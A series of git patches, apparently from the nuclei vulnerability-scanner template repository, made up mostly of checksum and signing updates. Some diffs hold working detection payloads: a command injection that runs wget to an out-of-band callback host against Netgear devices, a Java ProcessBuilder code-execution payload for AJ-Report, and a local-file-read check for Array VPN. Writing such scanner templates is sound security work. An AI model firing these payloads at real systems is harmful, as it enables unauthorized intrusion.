From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:06:57 +0530 Subject: [PATCH 286/847] fofa update --- http/cves/2024/CVE-2024-21683.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 08f731727f..3be7e486e6 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -20,7 +20,7 @@ info: epss-score: 0.00043 epss-percentile: 0.0866 metadata: - shodan-query: product:"Confluence" + fofa-query: app="ATLASSIAN-Confluence" verified: true tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive From 3cd7fa2bc7ab0229fdf8231c5f10ff4f870720aa Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:40:52 +0000 Subject: [PATCH 287/847] Auto Generated New Template Addition List [Mon May 27 08:40:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc889fb6f6..31a501e9f8 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-48084.yaml +http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml From 0a101e8ab99b1b10337f91ba0c46be9bc2389223 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:41:00 +0000 Subject: [PATCH 288/847] Auto Generated Templates Checksum [Mon May 27 08:41:00 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 15981522b0..90953aba31 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3261,6 +3261,7 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 +http/cves/2024/CVE-2024-21683.yaml:2bf0436e09be8426c5e84824d11879e00cdc42a0 http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db @@ -3355,7 +3356,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 -http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:08687154827e9f23b01688eb3729593fa00aaf5d +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:349ed67c3abeedfb09c053fc0c7d7b366e71cc74 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee http/default-logins/dvwa/dvwa-default-login.yaml:0803d0330a8ea7cbd071f03e54c1ea65d415ee76 @@ -4062,7 +4063,7 @@ http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 -http/exposed-panels/microfocus-filr-panel.yaml:c235633a12af9ea65ce3e61eadae5492bd68b5f7 +http/exposed-panels/microfocus-filr-panel.yaml:27c818153e52e1a77b8579958f1cf752c28746c6 http/exposed-panels/microfocus-lifecycle-panel.yaml:e24f25ddf4c8adcddde94e8284c533410f54b8bb http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -8564,7 +8565,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e214e3dcbd37b62ccd20063108f02dc07d5b4aaa +templates-checksum.txt:c42877fb34d180fc422d5659e62765d71b4846ab wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 92d70de4af873bbbd6fd397a8e66917541a72144 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:41:31 +0000 Subject: [PATCH 289/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 534014cb60..061d705328 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' + - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' From ee8cabee0319ea52d3646a015ff3112489758f61 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:42:45 +0000 Subject: [PATCH 290/847] Auto Template Signing [Mon May 27 08:42:45 UTC 2024] :robot: --- http/cves/2024/CVE-2024-21683.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 3be7e486e6..aca95fbafd 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -69,3 +69,4 @@ http: - contains(interactsh_protocol, 'dns') - contains(body_3, "confluence") condition: and +# digest: 490a0046304402205e17e1f46f7d3be0e24a6719947291bcd7ee29f12eff3302d5caac3b06b960e00220762f9672204a4cd09ae9f6af85a8b7ec5c363be85a365d69f5416dc5d6582a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d7443fa9153e58121ba4133cdf7dedd5d2e40e23 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:20:53 +0530 Subject: [PATCH 291/847] minor update --- http/cves/2023/CVE-2023-2059.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 7d5cf4ebcc..4cb72fc02c 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -1,7 +1,7 @@ id: CVE-2023-2059 info: - name: DedeCMS 5.7.87 - Directory Traversal Vulnerability + name: DedeCMS 5.7.87 - Directory Traversal author: pussycat0x severity: medium description: | @@ -15,14 +15,17 @@ info: cvss-score: 5.3 cve-id: CVE-2023-2059 cwe-id: CWE-28 - epss-score: 0.00107 - epss-percentile: 0.42813 + epss-score: 0.0012 + epss-percentile: 0.46305 cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 vendor: dedecms product: dedecms fofa-query: app="DedeCMS" - tags: cve,cve2023,dedecms + shodan-query: http.html:"dedecms" + tags: cve,cve2023,dedecms,lfi http: - raw: @@ -37,7 +40,9 @@ http: words: - "dirname(__FILE__)" - "$cfg_basedir" + - "dedecms" condition: and + case-insensitive: true - type: status status: From 6655a9beccb68cbf31d070c435290f13dbd3842a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:54:26 +0000 Subject: [PATCH 292/847] Auto Generated New Template Addition List [Mon May 27 08:54:26 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 31a501e9f8..6a7b50cdfe 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-1580.yaml +http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml From 1a817bd4aaa8a74ad9e2acd0e9e7d62871de6d23 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:54:35 +0000 Subject: [PATCH 293/847] Auto Generated Templates Checksum [Mon May 27 08:54:35 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 90953aba31..920a31834a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2916,6 +2916,7 @@ http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 http/cves/2023/CVE-2023-2023.yaml:521a587d1d6ebb7014e0800bf4f7a89a66e4bff5 +http/cves/2023/CVE-2023-2059.yaml:98c1b62d9f6b0892241c35c396508d7efe868e28 http/cves/2023/CVE-2023-20864.yaml:39eebb5c215549237a86a0446e07210bc37b47d4 http/cves/2023/CVE-2023-20887.yaml:ed50cf91b29dcdf6a78a4e524805ac4758ea41da http/cves/2023/CVE-2023-20888.yaml:99b2bd7f57dedcd0a4fa003660be6817b734806f @@ -3261,7 +3262,7 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21683.yaml:2bf0436e09be8426c5e84824d11879e00cdc42a0 +http/cves/2024/CVE-2024-21683.yaml:1e5be00ea45b6b0b78b88c83572f346333c3feaf http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db @@ -8565,7 +8566,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c42877fb34d180fc422d5659e62765d71b4846ab +templates-checksum.txt:9e685fe1f19fa2f9e2b049a93aae38fd8ceae314 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d8a19a4ad45a60488f65bb5f6104c83a2668f7f2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:55:06 +0000 Subject: [PATCH 294/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 061d705328..0968c201b8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' From f6190206477a99e2151f86a27214b75a3b16131e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:56:18 +0000 Subject: [PATCH 295/847] Auto Template Signing [Mon May 27 08:56:18 UTC 2024] :robot: --- http/cves/2023/CVE-2023-2059.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 4cb72fc02c..df356bf630 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022011648b7817f4854aa279b9f331d26ac1f4c03e23eca21457ee72d3397588b7140220513fe0ffaebd0415deced1853ffb70ac950380da12a680d10e4be106aa47913a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0551ac2a392f3c4ff5a72763f4c453937d87bdb3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 27 May 2024 20:55:22 +0530 Subject: [PATCH 296/847] lint - fix --- http/iot/netgear-boarddataww-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index c83be5cafd..56d5921e84 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -19,7 +19,7 @@ http: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit matchers-condition: and From f4b8454175f2401a8f806b9a8b9ecbf2b2dc2a71 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 27 May 2024 21:10:27 +0530 Subject: [PATCH 297/847] Update aj-report-rce.yaml --- http/vulnerabilities/other/aj-report-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml index aa59ce8e6e..a39694e3c4 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -21,7 +21,7 @@ http: Content-Type: application/json;charset=UTF-8 {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} - + matchers-condition: and matchers: - type: word @@ -34,7 +34,7 @@ http: - type: regex part: body regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - type: status status: From ef8901dc663dc85d70ed997e995cc7c6ed0f55cf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 27 May 2024 22:06:07 +0530 Subject: [PATCH 298/847] Update array-vpn-lfi.yaml --- http/vulnerabilities/other/array-vpn-lfi.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index e8a1b14843..50af402872 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -23,12 +23,15 @@ http: matchers-condition: and matchers: - - type: regex + - type: word part: body + words: + - "/prx/001/http/localh" + + - type: regex regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - condition: and + - "root:.*:0:0:" - type: status status: - - 200 + - 401 From be764f75e6d3251c440cfbfea686f2c995b93b6b Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 27 May 2024 19:33:20 +0200 Subject: [PATCH 299/847] Update tech-detect.yaml --- http/technologies/tech-detect.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index a4fcb1488b..eefd4e89e1 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -2,7 +2,7 @@ id: tech-detect info: name: Wappalyzer Technology Detection - author: hakluke + author: hakluke,righettod severity: info metadata: max-request: 1 @@ -2234,6 +2234,14 @@ http: - href="(?:\/|[^>]+)webapp\/wcs\/ condition: or part: body + + - type: word + name: ibm-websphere-application-server + words: + - 'SRVE0255E:' + - 'A WebGroup/Virtual Host to handle' + condition: or + part: body - type: regex name: bootstrap @@ -3718,4 +3726,3 @@ http: part: server words: - "istio-envoy" -# digest: 4a0a00473045022100dda47d007d349ebedb421dbacca584c8a22ec4f7eef5c4500bb051ec65bc11fc02206c9f127f5f0ba79e1ad88514f2e37693741a04f6b9b492a58a6143d05d83c780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 61cdcefcf9beaf0b736fd254dbaf5ae84c489ec1 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 27 May 2024 19:39:05 +0200 Subject: [PATCH 300/847] Fix linter error --- http/technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index eefd4e89e1..5348890da9 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -2234,7 +2234,7 @@ http: - href="(?:\/|[^>]+)webapp\/wcs\/ condition: or part: body - + - type: word name: ibm-websphere-application-server words: From e5c5006ec6dd02a7028c976d7f85a505ead1f685 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 27 May 2024 20:20:26 +0200 Subject: [PATCH 301/847] Update default-oracle-application-page.yaml --- .../oracle/default-oracle-application-page.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/http/technologies/oracle/default-oracle-application-page.yaml b/http/technologies/oracle/default-oracle-application-page.yaml index 721b90f2c6..3613c92279 100644 --- a/http/technologies/oracle/default-oracle-application-page.yaml +++ b/http/technologies/oracle/default-oracle-application-page.yaml @@ -2,7 +2,7 @@ id: default-oracle-application-page info: name: Oracle Application Server Containers - author: dhiyaneshDk + author: dhiyaneshDk,righettod severity: info metadata: max-request: 1 @@ -17,7 +17,12 @@ http: matchers: - type: word words: - - "Oracle Application Server Containers for J2EE 10g" + - "Oracle Application Server" part: body -# digest: 4b0a00483046022100b5780eb561a58f9d667836c535ca4bb787b2a83dab8870ef6e82a6760499f5ab022100f615f1b3ea1b9d9096cf240a0920aeab2287005c10cfe2b5241c9be736cb424b:922c64590222798bb761d5b6d8e72950 + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)\s+\(([0-9.]+)\)' From a3a18c55b239711889ad344a52b53855d075e049 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 27 May 2024 18:36:43 +0000 Subject: [PATCH 303/847] Auto Generated Templates Checksum [Mon May 27 18:36:43 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 920a31834a..eb48ea87af 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2916,7 +2916,7 @@ http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 http/cves/2023/CVE-2023-2023.yaml:521a587d1d6ebb7014e0800bf4f7a89a66e4bff5 -http/cves/2023/CVE-2023-2059.yaml:98c1b62d9f6b0892241c35c396508d7efe868e28 +http/cves/2023/CVE-2023-2059.yaml:856fa67098cc6c0abe1bb0921e4dd4205bd017ee http/cves/2023/CVE-2023-20864.yaml:39eebb5c215549237a86a0446e07210bc37b47d4 http/cves/2023/CVE-2023-20887.yaml:ed50cf91b29dcdf6a78a4e524805ac4758ea41da http/cves/2023/CVE-2023-20888.yaml:99b2bd7f57dedcd0a4fa003660be6817b734806f @@ -6972,7 +6972,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:4927d380410beb3d0274f8d51acdd78d2924f74e +http/technologies/tech-detect.yaml:33e4cb0e7c7275085251281fc8269241ae77bf77 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8566,7 +8566,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9e685fe1f19fa2f9e2b049a93aae38fd8ceae314 +templates-checksum.txt:9d9ebfedd3e3e99fbb61fea2e509e60e3fd09636 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d4816d5b7d5ee8f9963dd7e6a9de8ae42970378e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 27 May 2024 18:38:13 +0000 Subject: [PATCH 305/847] Auto Generated Templates Checksum [Mon May 27 18:38:13 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index eb48ea87af..c570b26afc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6896,7 +6896,7 @@ http/technologies/openproject-detect.yaml:91c1e50d8a05629807ab0f013c664e6edf7f1e http/technologies/openresty-detect.yaml:255ca922fa6904e6ea0bb314d24516bce3204e96 http/technologies/openssl-detect.yaml:3dedd81330e4f4ae3b6ae11b429e4e0bd5b8580d http/technologies/operations-automation-default-page.yaml:166d229fff5150b81bd81ce6db4c4078bdcff0d5 -http/technologies/oracle/default-oracle-application-page.yaml:bc4104ffab5e1988193399109e560d90d06b4073 +http/technologies/oracle/default-oracle-application-page.yaml:e8f83225d2a9f60f31fedf9cc9f76dd7edd0531e http/technologies/oracle/oracle-access-manager-detect.yaml:f4287a567c96e6f4ec9da0a832d8691b4b681a7f http/technologies/oracle/oracle-atg-commerce.yaml:f8279ae12859c82558baae4d9df611b74bd875e1 http/technologies/oracle/oracle-dbass-detect.yaml:b8eb13459d727a34bde146f1265c28a71e14c90b @@ -8566,7 +8566,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9d9ebfedd3e3e99fbb61fea2e509e60e3fd09636 +templates-checksum.txt:f41a35ec5b35d3ea6df3bf44a7b74a8b96fd20c5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 910f87df3aba174bd400ec7be38b69568daf5358 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 27 May 2024 18:38:32 +0000 Subject: [PATCH 306/847] Auto Template Signing [Mon May 27 18:38:32 UTC 2024] :robot: --- http/technologies/tech-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 5348890da9..21d19515ab 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3726,3 +3726,4 @@ http: part: server words: - "istio-envoy" +# digest: 4b0a00483046022100ba8d6eae9311c902babb5fce09a84ba79bb0317dbf6caca514245e0c60a3b3520221009ce0d2c9c1144d45590bfed8ab4c81f6bde45a053a2b3156d25bdb4aba006253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fc1914cbbdfc9ca22fb80ca7d04ebfce83c61b45 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:11:44 +0530 Subject: [PATCH 307/847] minor update --- http/vulnerabilities/other/array-vpn-lfi.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index 50af402872..23520f30de 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -10,6 +10,8 @@ info: - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: fofa-query: product="Array-VPN" + max-request: 1 + verified: true tags: lfi,vpn,arrayvpn http: From e08f8d384227274471676001648c2145966bcb80 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:46:54 +0000 Subject: [PATCH 308/847] Auto Generated New Template Addition List [Tue May 28 01:46:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6a7b50cdfe..f7f5cc81ea 100644 --- a/.new-additions +++ b/.new-additions @@ -5,4 +5,5 @@ http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 7e622c7fc9849befa3a6fbf8ef9ae347c3317939 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:47:03 +0000 Subject: [PATCH 309/847] Auto Generated Templates Checksum [Tue May 28 01:47:03 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c570b26afc..3a2d1fce4c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6972,7 +6972,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:33e4cb0e7c7275085251281fc8269241ae77bf77 +http/technologies/tech-detect.yaml:8da8bdae62f4f497e27b797a3571dab0e2c7e579 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -7662,6 +7662,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a 